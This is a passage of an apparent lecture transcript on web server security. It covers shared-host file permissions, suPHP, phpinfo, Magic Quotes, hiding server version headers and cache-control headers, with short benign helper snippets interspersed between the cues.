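As a rough sketch of what chmod g+r does, the snippet below adds the group-read bit to a throwaway temporary file. It assumes a POSIX system; the helper name `add_group_read` is made up for illustration.

```python
import os
import stat
import tempfile


def add_group_read(path: str) -> None:
    """Equivalent in spirit to `chmod g+r path`: keep existing bits, add group read."""
    mode = stat.S_IMODE(os.stat(path).st_mode)
    os.chmod(path, mode | stat.S_IRGRP)


with tempfile.NamedTemporaryFile() as scratch:  # throwaway file, deleted on exit
    os.chmod(scratch.name, 0o600)               # start as owner read/write only
    add_group_read(scratch.name)
    print(oct(stat.S_IMODE(os.stat(scratch.name).st_mode)))  # 0o640
```

Only members of the file's group gain access this way, which is why the web server's account would have to be placed in that group.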

378
00:16:01,656 --> 00:16:02,786
All right, so that's not bad.

379
00:16:02,896 --> 00:16:05,706
It's a little more work and
it's a little weird I would say

380
00:16:05,706 --> 00:16:08,036
that you have all of these
students for instance or all

381
00:16:08,036 --> 00:16:10,656
of these customers in a
group and the web server

382
00:16:10,656 --> 00:16:13,306
who is not a customer or a
student in that same group.

383
00:16:13,306 --> 00:16:15,086
It's a little weird,
but possible.

384
00:16:15,266 --> 00:16:18,056
But if we don't like that
we could just do A plus R,

385
00:16:18,056 --> 00:16:20,096
all plus everybody
can read the files,

386
00:16:20,416 --> 00:16:21,916
and that seems reasonable right?

387
00:16:21,916 --> 00:16:24,296
Because if my GIF's, and
JPEG's, and HTML files are

388
00:16:24,296 --> 00:16:25,576
on the Internet they're
meant to be read.

389
00:16:25,576 --> 00:16:29,646
What's the big deal about giving
read access to all students

390
00:16:29,646 --> 00:16:31,836
or to Apache and other
accounts on the system?

391
00:16:31,836 --> 00:16:32,016
Jack?

392
00:16:32,296 --> 00:16:34,806
>> Well that means if I really
wanted to I could find a way

393
00:16:34,896 --> 00:16:39,156
to easily see your plain
text PHP without having

394
00:16:39,156 --> 00:16:41,196
to go through any hoops.

395
00:16:41,196 --> 00:16:43,946
>> So in this case if
you're on a shared webhost

396
00:16:44,306 --> 00:16:46,716
and you're a customer,
someone else is a customer,

397
00:16:46,716 --> 00:16:47,856
someone else is a customer,

398
00:16:48,116 --> 00:16:51,376
and all of you have your own
websites, which is common

399
00:16:51,476 --> 00:16:54,186
on a virtual hosting environment
like, DreamHost or the like,

400
00:16:54,696 --> 00:16:58,536
but the web server by necessity
needs you to chmod your files

401
00:16:58,536 --> 00:17:02,196
to be world readable, those
files then are going to be readable

402
00:17:02,196 --> 00:17:04,066
by anyone else on the system.

403
00:17:04,066 --> 00:17:06,066
For instance, if Axle
has chmoded his files

404
00:17:06,066 --> 00:17:09,256
to be world readable just
because Apache needs them to be.

405
00:17:09,396 --> 00:17:11,696
Well if Jack is a
malicious user on the system

406
00:17:11,696 --> 00:17:14,426
and knows Axle's username he
can essentially start poking

407
00:17:14,426 --> 00:17:18,006
around his account using cd or
ls or the various Linux commands

408
00:17:18,006 --> 00:17:21,376
with which you could do this,
and see Axle's PHP files,

409
00:17:21,376 --> 00:17:23,006
inside of which might
be passwords,

410
00:17:23,006 --> 00:17:24,276
usernames, and so forth.
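One way to see the exposure being described is to check the "other" read bit on a file. This is only a sketch: is_world_readable is a hypothetical helper, and the scratch file stands in for a PHP file that holds a password.

```shell
# Sketch: report whether accounts other than the owner and group can read a file.
# is_world_readable is a hypothetical helper, not a standard command.
is_world_readable() {
  # Character 8 of the ls -l mode string is the read bit for "other".
  [ "$(ls -ld "$1" | cut -c8)" = "r" ]
}

secret_file="$(mktemp)"      # stands in for a PHP file containing credentials
chmod a+r "$secret_file"     # what the shared host asks customers to do
is_world_readable "$secret_file" && echo "readable by every account on the box"

chmod o-r "$secret_file"     # withdraw read access from "other"
is_world_readable "$secret_file" || echo "no longer world readable"
```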

411
00:17:24,626 --> 00:17:25,536
So it doesn't feel ideal,

412
00:17:25,536 --> 00:17:29,266
it feels like we're giving too
much access to the world here.

413
00:17:29,266 --> 00:17:29,376
Yeah?

414
00:17:29,376 --> 00:17:31,376
>> But the PHP source
would never be distributed

415
00:17:31,456 --> 00:17:32,706
over the Internet, right?

416
00:17:34,076 --> 00:17:35,746
Because it actually
is configured never

417
00:17:35,746 --> 00:17:40,216
to display the PHP source
unless there's an internal

418
00:17:40,216 --> 00:17:40,476
server error.

419
00:17:40,476 --> 00:17:40,716
>> Good. Correct.

420
00:17:40,716 --> 00:17:44,596
So, in this case your PHP code
is not at risk for being spit

421
00:17:44,596 --> 00:17:47,326
out on the Internet
without being interpreted.

422
00:17:47,606 --> 00:17:50,526
The threat here is that Jack
is just another paying customer

423
00:17:50,526 --> 00:17:51,496
on the same server.

424
00:17:51,716 --> 00:17:53,406
So at least it's not
billions of people,

425
00:17:53,406 --> 00:17:54,786
who could potentially
see your code,

426
00:17:55,016 --> 00:17:58,466
but it's at least a few more
malicious users or just curious,

427
00:17:58,466 --> 00:18:00,386
nosy people who are
poking around the account.

428
00:18:00,626 --> 00:18:03,156
So thankfully there do exist
protections against even this,

429
00:18:03,156 --> 00:18:04,546
and even the
appliance has this built

430
00:18:04,546 --> 00:18:06,596
in even though it's
not strictly necessary

431
00:18:06,596 --> 00:18:09,046
if there's only one John
Harvard and the appliance isn't

432
00:18:09,046 --> 00:18:09,856
on the whole Internet.

433
00:18:10,126 --> 00:18:14,476
But the principle is the same
in that suPHP and other software

434
00:18:14,476 --> 00:18:18,656
like it allows you to
specify that the username

435
00:18:18,656 --> 00:18:21,806
that should be used to
execute this PHP file should

436
00:18:21,806 --> 00:18:22,666
be jharvard.

437
00:18:22,806 --> 00:18:25,136
Shouldn't be HTTPD,
definitely shouldn't be root,

438
00:18:25,286 --> 00:18:27,346
it should be whoever
actually owns the file.

439
00:18:27,656 --> 00:18:30,876
So the idea here is that
when you are running Apache

440
00:18:31,366 --> 00:18:34,646
in the appliance, which
I'm currently doing as,

441
00:18:34,646 --> 00:18:37,676
is anyone else running this
version of it, and I'm going

442
00:18:37,676 --> 00:18:39,576
to run a command that we
haven't run before but just

443
00:18:39,576 --> 00:18:44,916
to poke around, ps aux
and then grep httpd.

444
00:18:45,326 --> 00:18:47,946
So this is a fairly
cryptic sequence of symbols

445
00:18:47,996 --> 00:18:52,066
that simply gives me a process
list, ps, with a bunch of flags

446
00:18:52,066 --> 00:18:53,406
which means show me everything.

447
00:18:53,406 --> 00:18:58,306
The pipe means send the output
of ps to the command grep,

448
00:18:58,306 --> 00:19:00,596
and the grep command
is like a find command.

449
00:19:00,896 --> 00:19:03,276
So I'm saying spit
out the process list,

450
00:19:03,276 --> 00:19:04,876
all the running programs
on the system,

451
00:19:04,876 --> 00:19:07,656
like the activity monitor or
the task manager in Mac OS

452
00:19:07,656 --> 00:19:08,816
and Windows, respectively.

453
00:19:08,816 --> 00:19:12,736
And then pass that output to
grep and search for httpd.
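The same idea can be sketched as a small filter that prints only who owns the matching processes. process_owners is a hypothetical helper; it assumes the usual ps aux layout, where the user is column 1 and the command is column 11.

```shell
# process_owners is a hypothetical helper: it reads `ps aux` style output on
# stdin and prints the distinct users running a command whose name matches $1.
process_owners() {
  # NR > 1 skips the header row; $11 is the COMMAND column, $1 the USER column.
  awk -v name="$1" 'NR > 1 && $11 ~ name { print $1 }' | sort -u
}

# Live use; prints nothing if no matching process is running on this machine.
ps aux | process_owners httpd
```

On a machine like the one in the demo, the output would be expected to list the account the web server runs as, rather than the accounts of individual users.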

454
00:19:12,736 --> 00:19:14,096
And I'm going to hit enter

455
00:19:14,596 --> 00:19:16,486
and what you see
here is, oh, I lied.

456
00:19:16,576 --> 00:19:20,356
The username that's being used
is not in fact Apache it is --

457
00:19:20,786 --> 00:19:23,606
sorry, not in fact
httpd, it's Apache.

458
00:19:23,896 --> 00:19:26,756
So in this case each
of these rows says

459
00:19:26,826 --> 00:19:30,606
that there's a program called
httpd running on the system,

460
00:19:30,736 --> 00:19:32,026
and that's to be
expected, right?

461
00:19:32,026 --> 00:19:34,266
The appliance runs a web
server, that's how project zero,

462
00:19:34,266 --> 00:19:36,576
project one works
in the appliance.

463
00:19:36,576 --> 00:19:37,856
There seems to be a
whole bunch of them,

464
00:19:37,856 --> 00:19:38,986
but more on that in a moment.

465
00:19:39,346 --> 00:19:42,316
But if I scroll to the left
you see in the left most column

466
00:19:42,316 --> 00:19:47,186
who the web server is running as
here and almost all of those are

467
00:19:47,186 --> 00:19:50,656
as Apache, and it's those
rows that are going to be used

468
00:19:50,656 --> 00:19:55,026
to actually execute user
code or serve up user files.

469
00:19:55,416 --> 00:19:57,616
But you don't see jharvard's
name, but that's fine

470
00:19:57,936 --> 00:20:01,536
because notice what's going
to happen here if I go

471
00:20:01,536 --> 00:20:05,776
into my vhost directory
and my appliance directory.

472
00:20:06,066 --> 00:20:08,016
Here's all of our
examples from last time.

473
00:20:08,176 --> 00:20:10,646
I'm going to do a quick and
dirty demo here, demo.php.

474
00:20:10,646 --> 00:20:18,876
And I'm going to
say echo "hello";

475
00:20:19,716 --> 00:20:21,506
just as a quick test.

476
00:20:22,006 --> 00:20:24,536
Okay, and let me zoom out.

477
00:20:24,536 --> 00:20:29,086
Let me open my browser,
and let me go

478
00:20:29,086 --> 00:20:33,376
to http://appliance/demo.php.

479
00:20:33,376 --> 00:20:36,556
Okay, so now we're --
this is just sort of,

480
00:20:36,556 --> 00:20:37,676
we did this weeks ago.

481
00:20:37,976 --> 00:20:40,116
So now let's do something
a little more interesting.

482
00:20:40,116 --> 00:20:43,346
Let's do echo `whoami`;

483
00:20:43,536 --> 00:20:49,486
Now notice I'm using back-ticks,
which mean execute the command

484
00:20:49,726 --> 00:20:50,476
called whoami.

485
00:20:51,116 --> 00:20:53,456
So whoami is a program
on the system,

486
00:20:53,456 --> 00:20:55,556
and I can demonstrate
this at a command prompt.

487
00:20:55,856 --> 00:21:00,556
So let me pause that
program and run whoami enter,

488
00:21:00,556 --> 00:21:01,786
and I'm indeed jharvard.

489
00:21:02,076 --> 00:21:05,376
If I go back in here, the
fact that I'm putting whoami

490
00:21:05,526 --> 00:21:07,096
in the PHP program means

491
00:21:07,236 --> 00:21:09,866
that when this file is
interpreted it's going

492
00:21:09,866 --> 00:21:12,186
to inform me who is
interpreting the file.
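Back-ticks behave the same way at a shell prompt as they do in the PHP line above, so the test can be sketched without a web server. The variable name current_user is just for illustration.

```shell
# Back-ticks run the command and substitute its output into the string.
echo "This script is running as: `whoami`"

# $(...) is the modern shell spelling of the same command substitution.
current_user="$(whoami)"
echo "$current_user"
```

Run from a login shell this reports your own account; the point of the PHP version is that it reports whichever account the web server uses to interpret the file.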

493
00:21:12,486 --> 00:21:14,966
And so the litmus test
here is, is it root?

494
00:21:15,256 --> 00:21:16,106
Is it apache?

495
00:21:16,346 --> 00:21:17,396
Or is it jharvard?

496
00:21:17,486 --> 00:21:19,336
Hopefully it's jharvard,

497
00:21:19,556 --> 00:21:22,516
otherwise suPHP is
not in fact enabled.

498
00:21:22,886 --> 00:21:24,706
So let's go down here
to the appliance again.

499
00:21:25,386 --> 00:21:28,426
Let's reload, and indeed
I'm running the web server

500
00:21:28,426 --> 00:21:29,536
as jharvard.

501
00:21:30,046 --> 00:21:38,916
And if I weren't using suPHP we would
instead see the username Apache

502
00:21:39,296 --> 00:21:39,836
in this case.

503
00:21:39,986 --> 00:21:42,986
As an aside, too, another thing
that's useful diagnostically

504
00:21:42,986 --> 00:21:44,506
when you're setting
up your own webhost,

505
00:21:44,506 --> 00:21:46,886
which some of you might want
to do after the class ends,

506
00:21:47,246 --> 00:21:49,676
there's a function in
PHP called phpinfo.

507
00:21:49,996 --> 00:21:51,936
Generally you would
not write a program

508
00:21:52,046 --> 00:21:55,426
and then make it available on
the web that echoes phpinfo

509
00:21:55,426 --> 00:21:57,576
because this dumps
all of the details

510
00:21:57,576 --> 00:22:00,836
of the current php installation,
including its version number

511
00:22:01,086 --> 00:22:03,136
and all of the various
modules that are installed.

512
00:22:03,556 --> 00:22:05,526
But if I go up here and click

513
00:22:05,526 --> 00:22:09,716
on reload this is what
phpinfo spits out.

514
00:22:09,716 --> 00:22:11,036
It deliberately spits
out a whole bunch

515
00:22:11,036 --> 00:22:14,026
of HTML that's crazy
cryptic looking at first

516
00:22:14,246 --> 00:22:18,276
but this configure command
essentially tells you how the

517
00:22:18,316 --> 00:22:22,066
people at Fedora, who
oversee this operating system,

518
00:22:22,526 --> 00:22:24,476
decided to compile
this version of PHP.

519
00:22:24,476 --> 00:22:27,696
So PHP itself, recall, is a
program, it's an interpreter;

520
00:22:27,696 --> 00:22:30,106
it's an executable program
that happens to read

521
00:22:30,106 --> 00:22:31,426
or interpret other programs.

522
00:22:31,856 --> 00:22:35,086
It itself is written in C,
or C plus plus most likely,

523
00:22:35,316 --> 00:22:38,936
and this is the command
with which they compiled PHP

524
00:22:39,406 --> 00:22:41,356
from source code
into its binary.

525
00:22:41,556 --> 00:22:43,606
And all of these various flags
essentially tell you what

526
00:22:43,606 --> 00:22:44,566
features are enabled.

527
00:22:44,566 --> 00:22:45,916
But there's an easier
way to parse this.

528
00:22:45,916 --> 00:22:48,826
If we scroll down we see
a whole bunch of stuff.

529
00:22:48,826 --> 00:22:52,866
For instance, I mentioned weeks
ago php.ini is the configuration

530
00:22:52,866 --> 00:22:55,436
file that's typically used,
and this output is confirming

531
00:22:55,436 --> 00:22:57,436
as much, that the config
file we're using is

532
00:22:57,436 --> 00:23:01,256
in the etc directory,
called php.ini.

533
00:23:01,476 --> 00:23:04,416
We have, let's see, what
are other particulars here

534
00:23:04,416 --> 00:23:05,676
of interest.

535
00:23:07,016 --> 00:23:10,156
You can see that there's
apparently built in bz2,

536
00:23:10,156 --> 00:23:12,886
which is compression support,
some kind of calendar support,

537
00:23:13,296 --> 00:23:15,006
some kind of -- let's
scroll down -- woops.

538
00:23:15,736 --> 00:23:17,986
Let's scroll down
even further to --

539
00:23:19,016 --> 00:23:20,666
let's see if we can find this.

540
00:23:21,606 --> 00:23:23,496
DOM support and so forth.

541
00:23:23,496 --> 00:23:25,506
So PHP has a whole
bunch of modules

542
00:23:25,506 --> 00:23:26,636
that you can add optionally,

543
00:23:26,816 --> 00:23:29,516
and long story short this
output just informs you what's

544
00:23:29,516 --> 00:23:30,236
actually there.

545
00:23:30,526 --> 00:23:32,196
So this is useful
because sometimes

546
00:23:32,196 --> 00:23:34,706
when you're using commercial
webhosts they might have certain

547
00:23:34,706 --> 00:23:37,456
features on that you did not
have on in the appliance.

548
00:23:37,526 --> 00:23:39,976
They might have certain features
off, and running this, say,

549
00:23:39,976 --> 00:23:42,646
on your local machine, your
Mac, your PC, your appliance,

550
00:23:42,646 --> 00:23:45,846
and then also running this
command on the remote webhost,

551
00:23:45,846 --> 00:23:47,686
like DreamHost, will
give you a sense

552
00:23:47,686 --> 00:23:49,206
of what the differences
might be.

553
00:23:49,206 --> 00:23:54,626
For instance, there is a feature
of PHP called Magic Quotes

554
00:23:54,806 --> 00:23:57,276
and this has largely been
disabled these days,

555
00:23:57,276 --> 00:23:58,786
but Magic Quotes did this.

556
00:23:58,916 --> 00:24:04,736
Anytime a user used GET or POST
to send input to a PHP file,

557
00:24:05,036 --> 00:24:07,376
PHP, if Magic Quotes
were enabled,

558
00:24:07,556 --> 00:24:12,856
would very presumptuously escape
all of the quotes in that input.

559
00:24:12,926 --> 00:24:16,526
So anytime there was a quote
PHP would automatically put a

560
00:24:17,386 --> 00:24:18,286
backslash there.

561
00:24:18,286 --> 00:24:20,766
The upside of this is
that if you then insert

562
00:24:20,766 --> 00:24:24,356
that into your database you're
already safe, for the most part.

563
00:24:24,646 --> 00:24:25,256
Right? Because all

564
00:24:25,256 --> 00:24:27,166
of the potentially dangerous
characters have been escaped.

565
00:24:27,166 --> 00:24:29,036
And we'll come back to SQL
injection attacks in a bit.

566
00:24:29,496 --> 00:24:33,566
The problem though is that if
you then call MySQL real escape

567
00:24:33,566 --> 00:24:36,036
string, or use PDO,
or the equivalent,

568
00:24:36,076 --> 00:24:38,236
it's going to escape
the escaped characters.
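The double-escaping effect can be sketched with a simplified stand-in for the escaping step. add_slashes is a hypothetical helper that only handles backslashes and single quotes; the real PHP feature and the database escaping functions cover more characters.

```shell
# add_slashes is a hypothetical, simplified stand-in for an escaping pass:
# it puts a backslash in front of every backslash and every single quote.
add_slashes() {
  printf '%s\n' "$1" | sed -e 's/\\/\\\\/g' -e "s/'/\\\\'/g"
}

once="$(add_slashes "O'Reilly")"   # what an automatic first pass hands the script
twice="$(add_slashes "$once")"     # what the script's own escaping then produces

printf '%s\n' "$once"    # O\'Reilly
printf '%s\n' "$twice"   # O\\\'Reilly
```

The second pass escapes the backslash added by the first, which is why stray backslashes end up stored and later displayed.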

569
00:24:38,236 --> 00:24:42,056
And so a symptom that just the
other day someone was seeing was

570
00:24:42,126 --> 00:24:44,926
that her code was spitting out

571
00:24:45,166 --> 00:24:47,636
"\" marks all throughout
her website,

572
00:24:47,636 --> 00:24:51,226
and it was because not only
was she escaping user input,

573
00:24:51,226 --> 00:24:54,776
as is good practice, the web
server was presumptuously doing it

574
00:24:54,776 --> 00:24:57,736
too, and so just a lot of bad
things happened aesthetically.

575
00:24:57,736 --> 00:24:59,266
So in short, this is
not a good feature

576
00:24:59,266 --> 00:25:01,306
where you should outsource your
security to the web server,

577
00:25:01,306 --> 00:25:02,956
you should be doing
this yourself in code.

578
00:25:03,506 --> 00:25:06,506
So this is something too that
can be helpful diagnostically.

579
00:25:06,506 --> 00:25:08,696
And if I search for this, let's
see if we can find it in here.

580
00:25:09,356 --> 00:25:10,896
Magic -- yeah, there it is here.

581
00:25:10,896 --> 00:25:13,856
So, enable-magic-quotes, but
we've disabled it elsewhere

582
00:25:14,206 --> 00:25:16,716
in the configuration file
even though Fedora enabled it

583
00:25:16,716 --> 00:25:17,436
by default.

584
00:25:18,516 --> 00:25:25,026
All right, so finally,
suPHP then ensures what?

585
00:25:25,486 --> 00:25:29,416
So, if your PHP files are
executed as you, jharvard,

586
00:25:29,416 --> 00:25:33,906
or Axle, or Jack, and you screw
up, and you write buggy PHP code

587
00:25:34,136 --> 00:25:39,256
that somehow allows someone
on the Internet to trick you

588
00:25:39,256 --> 00:25:41,186
into running commands,
not just whoami,

589
00:25:41,186 --> 00:25:45,206
but maybe the delete command,
whose files, whose accounts are

590
00:25:45,206 --> 00:25:46,546
at risk when using
something like suPHP?

591
00:25:46,546 --> 00:25:46,946
Jack?

592
00:25:46,946 --> 00:25:49,116
>> Only their own.

593
00:25:49,116 --> 00:25:50,476
>> Only their own.

594
00:25:50,476 --> 00:25:51,976
Right? You can't
affect other customers,

595
00:25:51,976 --> 00:25:53,206
you can't affect
the root account,

596
00:25:53,206 --> 00:25:54,966
you can't affect the
web server account.

597
00:25:55,296 --> 00:25:57,126
So in general this
is a very good thing.

598
00:25:57,126 --> 00:26:01,806
Meanwhile, files like images
and CSS files and HTML files,

599
00:26:02,026 --> 00:26:05,296
those are just served up, not
as you, but as Apache itself

600
00:26:05,296 --> 00:26:06,076
because it doesn't matter.

601
00:26:06,076 --> 00:26:08,866
Those are static files; they're
not programs being executed.

602
00:26:08,866 --> 00:26:13,006
So suPHP really just
applies here to PHP files.

603
00:26:14,036 --> 00:26:15,986
All right, so you guys
proposed cookies earlier

604
00:26:15,986 --> 00:26:19,646
as a potential threat and
here's one such example.

605
00:26:19,646 --> 00:26:21,656
So these are HTTP headers.

606
00:26:21,656 --> 00:26:24,636
Two hundred at the
top signifies what?

607
00:26:25,366 --> 00:26:25,826
Don't say okay.

608
00:26:25,826 --> 00:26:25,906
Yeah.

609
00:26:25,906 --> 00:26:30,946
>> Everything -- well,
it's really okay,

610
00:26:32,106 --> 00:26:35,716
but that the page has been
received by the client

611
00:26:35,716 --> 00:26:37,796
and there's no error
[inaudible] server side.

612
00:26:37,796 --> 00:26:38,376
>> Okay, good.

613
00:26:38,446 --> 00:26:40,736
So it indicates that there
was no error on the server

614
00:26:40,736 --> 00:26:42,896
and that everything is well,
it's been received okay,

615
00:26:42,896 --> 00:26:45,146
and indeed everything is okay.

616
00:26:45,146 --> 00:26:48,566
So this is in contrast to
something like 404, 401, 500,

617
00:26:48,566 --> 00:26:51,536
all of the various numbers that
we sometimes see on our own

618
00:26:51,536 --> 00:26:53,696
or other people's websites
when mistakes have happened.

619
00:26:54,026 --> 00:26:57,546
But here, 200, you rarely see
and in fact you'll only see it

620
00:26:57,546 --> 00:26:58,906
if you take a look
at the HTTP headers,

621
00:26:59,046 --> 00:27:00,656
because it means all is well.

622
00:27:00,896 --> 00:27:02,386
So we see some other
information.

623
00:27:02,386 --> 00:27:06,086
Date of the current web server,
when this response was made,

624
00:27:06,336 --> 00:27:10,076
the server's name and
version number, X-Powered-By.

625
00:27:10,406 --> 00:27:12,036
Why are these included
in the headers?

626
00:27:12,356 --> 00:27:12,666
Axle?

627
00:27:12,666 --> 00:27:16,796
>> Really no reason
other than [inaudible]

628
00:27:17,676 --> 00:27:22,086
and just Apache selling
their product.

629
00:27:22,356 --> 00:27:23,236
>> Which is free, in fairness.

630
00:27:23,746 --> 00:27:26,596
>> Yeah. No, no, no, but they
are telling people about it

631
00:27:26,636 --> 00:27:30,016
and it could be a
potential security risk

632
00:27:30,016 --> 00:27:32,666
because you are telling
people what version

633
00:27:32,666 --> 00:27:33,796
of PHP you are running.

634
00:27:33,956 --> 00:27:34,186
>> Good.

635
00:27:34,186 --> 00:27:38,706
>> So if, for example, we saw
an older version of PHP

636
00:27:38,706 --> 00:27:42,926
and later we had discovered
like a flaw in that,

637
00:27:42,926 --> 00:27:44,496
something that you do with
that, you would know that,

638
00:27:44,736 --> 00:27:46,316
well this server's vulnerable

639
00:27:46,316 --> 00:27:48,336
and now you can search the
Internet for those servers.

640
00:27:48,336 --> 00:27:48,876
>> Exactly.

641
00:27:48,996 --> 00:27:51,956
So one is branding, that's why
it's there for the most part.

642
00:27:52,206 --> 00:27:53,886
But two, the downside of this is

643
00:27:53,886 --> 00:27:56,216
that you're telling the whole world
not only what you're running

644
00:27:56,216 --> 00:27:57,216
but what version of it.

645
00:27:57,536 --> 00:28:01,716
So as Axle says, if there's
somehow a flaw discovered in PHP

646
00:28:01,946 --> 00:28:05,006
or in Apache, and it's in a
specific version of one of those

647
00:28:05,006 --> 00:28:07,316
because it was introduced
accidentally at some point.

648
00:28:07,716 --> 00:28:09,776
Well now, you've just told
the whole world that hey,

649
00:28:09,826 --> 00:28:12,446
I'm vulnerable to this
error and if someone is kind

650
00:28:12,506 --> 00:28:14,766
of like aggregating that
information and hanging onto it

651
00:28:14,766 --> 00:28:17,976
for a rainy day the moment
the world realizes that oh,

652
00:28:18,096 --> 00:28:20,676
PHP 5.3.3 is buggy,
let me go ahead

653
00:28:20,676 --> 00:28:23,846
and wage my attack using the
list I gathered in advance

654
00:28:24,166 --> 00:28:28,806
by poking around on the Internet
to compromise those servers.

655
00:28:28,916 --> 00:28:31,306
So you're just making
it unnecessarily easy

656
00:28:31,306 --> 00:28:31,996
for the adversary.

657
00:28:31,996 --> 00:28:33,816
So this kind of stuff is
typically on by default

658
00:28:34,006 --> 00:28:36,476
but where can you disable
something like the Apache line?

659
00:28:37,306 --> 00:28:38,336
Its version number?

660
00:28:40,276 --> 00:28:41,156
Where would you go?

661
00:28:41,156 --> 00:28:45,486
So if you agree that
this is not necessary

662
00:28:45,486 --> 00:28:47,866
and not great how do
you go turning this off?

663
00:28:48,426 --> 00:28:48,526
Jack?

664
00:28:49,796 --> 00:28:52,736
>> Isn't it somewhere
in the httpd.conf?

665
00:28:52,856 --> 00:28:54,816
>> Good. Yeah, so there's
this file we keep referring

666
00:28:54,816 --> 00:28:57,096
to httpd.conf.

667
00:28:57,446 --> 00:29:00,446
It's generally somewhere
in the etc directory,

668
00:29:00,446 --> 00:29:02,386
the et cetera directory,
and you just have

669
00:29:02,386 --> 00:29:04,576
to find the appropriate
line there that has to do

670
00:29:04,576 --> 00:29:07,536
with ServerTokens, which will
reveal whether or not --

671
00:29:07,696 --> 00:29:11,086
tokens, whether or not
this will be displayed.

672
00:29:11,236 --> 00:29:13,956
And how about something
related to PHP, X-Powered-By,

673
00:29:13,956 --> 00:29:16,526
how do you get rid of that?

674
00:29:16,736 --> 00:29:16,996
Axle?

675
00:29:17,606 --> 00:29:20,306
>> [Inaudible] to the php.ini.

676
00:29:20,686 --> 00:29:23,096
>> Yeah, exactly,
php.ini, the config file

677
00:29:23,096 --> 00:29:25,436
for PHP specifically,
there's a directive

678
00:29:25,436 --> 00:29:27,986
in there called
expose_php, which by default is

679
00:29:27,986 --> 00:29:29,926
on; you just have
to change it to off

680
00:29:29,926 --> 00:29:31,846
and then restart the web server.
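A sketch of that php.ini change, done on scratch files so nothing real is touched. The two-line file contents are made up for illustration and are not the appliance's actual configuration; restarting the web server is left out because the command varies by system.

```shell
# Work on a scratch copy; the contents are an invented excerpt, not a real php.ini.
ini_file="$(mktemp)"
printf '%s\n' '; sample excerpt' 'expose_php = On' > "$ini_file"

# Flip the directive to Off, writing the result to a second scratch file.
new_ini="$(mktemp)"
sed 's/^expose_php[[:space:]]*=.*/expose_php = Off/' "$ini_file" > "$new_ini"

# Confirm what the directive is set to now.
grep '^expose_php' "$new_ini"
```

The Apache side works the same way in spirit: one directive in httpd.conf controls how much the Server header reveals.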

681
00:29:32,356 --> 00:29:36,556
All right, so more interesting
is this expires date.

682
00:29:36,556 --> 00:29:37,546
This is kind of weird, right?

683
00:29:37,546 --> 00:29:42,006
I definitely didn't make
this example in 1981 and

684
00:29:42,006 --> 00:29:45,116
yet for some reason
there's mention of 1981.

685
00:29:45,176 --> 00:29:48,496
Thursday, 19 November, 1981 in
my headers, for some reason.

686
00:29:49,136 --> 00:29:51,776
Expires. Why is this here?

687
00:29:52,756 --> 00:29:58,566
Frankly, the Apache version
two and PHP 5.3.3 did not exist

688
00:29:58,566 --> 00:29:59,976
in 1981, let alone the web.

689
00:30:00,736 --> 00:30:04,776
At least in this form.

690
00:30:05,256 --> 00:30:09,346
What could that possibly
signify?

691
00:30:10,746 --> 00:30:11,606
Yeah? Scott?

692
00:30:12,516 --> 00:30:15,936
[ Inaudible Speaker ]

693
00:30:16,436 --> 00:30:19,366
Okay. So in this case it's
actually not the expiration date

694
00:30:19,366 --> 00:30:21,476
for the cookie, though
that's on the right track,

695
00:30:21,476 --> 00:30:23,116
but it's the expiration
date for the page.

696
00:30:23,116 --> 00:30:27,236
So if a browser and server
are trying to optimize so as

697
00:30:27,236 --> 00:30:29,876
to not re-download this
content unnecessarily

698
00:30:29,876 --> 00:30:30,946
if it hasn't changed,

699
00:30:31,286 --> 00:30:33,646
the expiration here
is telling the browser

700
00:30:33,776 --> 00:30:35,776
that this page expired
in the past,

701
00:30:35,776 --> 00:30:38,366
which means you should
always re-fetch it.

702
00:30:38,366 --> 00:30:40,536
And this is actually just
kind of a stupid convention;

703
00:30:40,536 --> 00:30:44,296
essentially what most
websites do is if you want

704
00:30:44,296 --> 00:30:48,056
to disable caching or try
to disable caching of things

705
00:30:48,056 --> 00:30:50,916
like HTML files that
are generated by PHP,

706
00:30:50,916 --> 00:30:53,176
or really whatever file
this is referring to here,

707
00:30:53,406 --> 00:30:56,056
you specify that this page
expired like 10 years ago.

708
00:30:56,416 --> 00:30:58,436
Right? So then you don't
do like a minute ago,

709
00:30:58,436 --> 00:30:59,416
you don't do an hour ago,

710
00:30:59,416 --> 00:31:01,086
just in case there's
a bit of clock skew.

711
00:31:01,086 --> 00:31:03,676
You choose something that's
really far in the past so that

712
00:31:03,676 --> 00:31:06,566
when the web server -- when the
browser receives this it's going

713
00:31:06,566 --> 00:31:08,596
to realize wow, this
page is really old,

714
00:31:08,926 --> 00:31:10,976
the next time you request
the same URL I'm going

715
00:31:10,976 --> 00:31:14,436
to definitely request it
again and not go to my cache.

716
00:31:14,826 --> 00:31:17,206
So not all browsers
historically have respected all

717
00:31:17,206 --> 00:31:19,026
of these things, so we have
an additional header here,

718
00:31:19,026 --> 00:31:21,656
Cache-Control: no-store,
no-cache, must-revalidate.

719
00:31:21,836 --> 00:31:23,526
All these possible
directives trying

720
00:31:23,526 --> 00:31:24,866
to really discourage caching.

721
00:31:25,186 --> 00:31:28,516
So in general you'll find
that this is a combination

722
00:31:28,516 --> 00:31:30,576
of techniques that people
use for various browsers.

723
00:31:30,626 --> 00:31:33,126
Pragma: no-cache is yet
another header that's meant

724
00:31:33,126 --> 00:31:34,966
to further discourage caching.

725
00:31:34,966 --> 00:31:37,036
At the end of the day the
browser can still do whatever it

726
00:31:37,036 --> 00:31:39,136
wants, so these various
headers exist really

727
00:31:39,136 --> 00:31:42,826
to really encourage the browser
to cooperate and not cache.
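To check which of these anti-caching headers a response carries, a small lookup is enough. This is a sketch: header_value is a hypothetical helper, and the sample response below is typed in by hand from the header names and values mentioned above rather than captured from a server.

```shell
# Hand-written sample using the headers discussed above.
headers='HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache'

# header_value is a hypothetical helper: $1 is a header name (any case),
# stdin is the raw header block; it prints the matching header's value.
header_value() {
  awk -F': ' -v want="$1" 'tolower($1) == tolower(want) { print $2 }'
}

printf '%s\n' "$headers" | header_value cache-control
printf '%s\n' "$headers" | header_value pragma
```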

728
00:31:43,186 --> 00:31:46,366
But there in bold is our
Set-Cookie header, PHPSESSID,

729
00:31:46,366 --> 00:31:50,006
big random sequence of
letters and numbers, path,

730
00:31:50,006 --> 00:31:54,126
and Set-Cookie: secret equals
12345 is not a session cookie,

731
00:31:54,496 --> 00:31:56,626
but what are some of
the takeaways here?

732
00:31:56,626 --> 00:31:59,856
So one, the set cookie
here does not seem

733
00:31:59,856 --> 00:32:02,846
to have an expiration
time associated with it.

734
00:32:03,216 --> 00:32:05,336
It's not -- there's no
mention of seven days

735
00:32:05,336 --> 00:32:06,646
from now, an hour from now.
